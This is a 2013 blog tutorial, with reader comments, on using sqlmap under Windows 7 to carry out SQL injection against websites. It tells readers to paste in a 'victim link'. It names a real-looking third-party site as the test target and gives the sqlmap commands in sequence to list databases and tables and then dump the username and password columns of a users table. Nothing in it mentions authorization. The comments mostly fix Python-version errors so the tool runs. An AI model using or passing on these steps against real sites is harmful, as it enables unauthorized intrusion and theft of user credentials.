Friday, 18 January 2013

Sqlmap Tutorial For Window 7

Posted on 08:54 by Anonymous

Hello Im Eagle Eye

Today im gonna teach you about sqlmap on windows 7

-----------------------------------------------------------------------------------------------------------

What do you need?
[python download for windows]
[Sqlmap windows]
First.. After you download and install python you must download Sqlmap for windows
After download it .. [Sqlmap Windows]
extract the file in Drive C

-----------------------------------------------------------------------------------------------------------

After that open your Command Promp (CMD)
Type   cd\
And then press ENTER
Type cd sqlmap\
And Enter

Copy your victim link
And type to cmd like this

sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs

Replace http://yoursite.com/index.php?id=123 to your link target
Enter!

-----------------------------------------------------------------------------------------------------------

The injected site will show the Database
My testing site http://ditto3d.com/gallery.php?id=7
Example Database Shown Is : ditto3d
                                              information_schema

If you want choose any database
you must do like shown above
sqlmap.py -u http://yoursite.com/index.php?id=123=7 -D databasename

-----------------------------------------------------------------------------------------------------------

-D (for Database)
databasename for example i put 'ditto3d' for get the table
So my site will like this

sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d --tables

For your site
--> sqlmap.py -u http://yoursite.com/index.php?id=123 -D your database --tables
Press Enter!

you will get a lot of tables
such as

[ users ]
[ category ]
[ links ]

from the tables , choose one of your target to get Username and Password

then your code in cmd will be like this

sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database -T your target tables

My code in cmd will shown like
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T users

-----------------------------------------------------------------------------------------------------------

Alright , we go to the next
what you must do is to get column
just add --columns after your code
it will be show like this

sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database T- your target tables --columns

Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users --columns

-----------------------------------------------------------------------------------------------------------

The tables will show the columns
such as users contain :

[ email ]
[ id ]
[ name ]
[ username ]
[ password ]

what you must to do is
adding   -C username --dump   behind

example :

sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T users -C username --dump

Yes you get it
Username is : blablabla

then do the same thing , but this to get 'password'
Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users -C password --dump

The password is : blablabla

-----------------------------------------------------------------------------------------------------------
Warning! : If you get the database , tables and columns
''  --  '' this string must be a one
such as like this

from database
--> after injected
--> the database are showed

the word database and the double string ( -- )
will be change
it will be like -D
the word database will short and be D
the word D must be a big word

-T   /  -C

( --dump ) do not change this string

After the big word such as -D
You must give one space

--->   -D database

-----------------------------------------------------------------------------------------------------------

THE END !
Categories:

10 comments:

  1. Unknown1 May 2013 at 12:17


    File "sqlmap.py", line 92
    except exceptionsTuple, e:
    ^
    SyntaxError: invalid syntax

    what the solution for this?

    ReplyDelete
    Replies
    1. heart22 June 2013 at 03:16

      What is your python version it will ok 2.7

      Delete
    2. komarudin1 October 2013 at 02:08

      I too have experienced the same thing in windows 7. after downgrade python to version 2.7.5 everything running well..

      Delete
    3. Anonymous16 October 2013 at 04:49

      dont use any other version of python except 2.7.That will solve the prob

      Delete
  2. Ramesh N28 March 2014 at 22:46

    You have to add the word python before the link.. Surely it works... Enjoy Guys...

    Eg: python sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs

    ReplyDelete
  3. triatma2 April 2014 at 02:12

    Nice tutorial sir.

    ReplyDelete
  4. Aniedeh Chizoba Paul16 November 2015 at 03:42

    when i run file"sqlmap.py" i got a command message

    Usage: sqlmap.py [options]
    sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help

    Press Enter to continue...

    But when i press Enter the sqlmap.py promt command will close down...
    PLS I NEED HELP

    ReplyDelete
  5. Aniedeh Chizoba Paul16 November 2015 at 16:02

    This comment has been removed by the author.

    ReplyDelete
  6. Aniedeh Chizoba Paul16 November 2015 at 16:09

    Download and Install Python 2.7
    Download and Extract sqlmap latest version

    Now Create a new shortcut of Cmd on Desktop,right click on it and go to "property" where you will see "start in"
    Now Change the directory in "start in" to where you extracted sqlmap and press ok
    eg: "Start In" C:\Users\user\Desktop\sqlmap

    Now Run the Cmd.exe Shortcut That You Created On Desktop, you can rename the Cmd.exe to anything.exe,bitch.exe,kiss.exe
    Now The Instalation and setup of sqlmap on Windows 7 is complete.

    ReplyDelete
  7. Mahajyoti30 May 2016 at 05:47

    Its Showing [18:11:13] [CRITICAL] option '-d' is incompatible with option '-u' ('--url') pls help

    ReplyDelete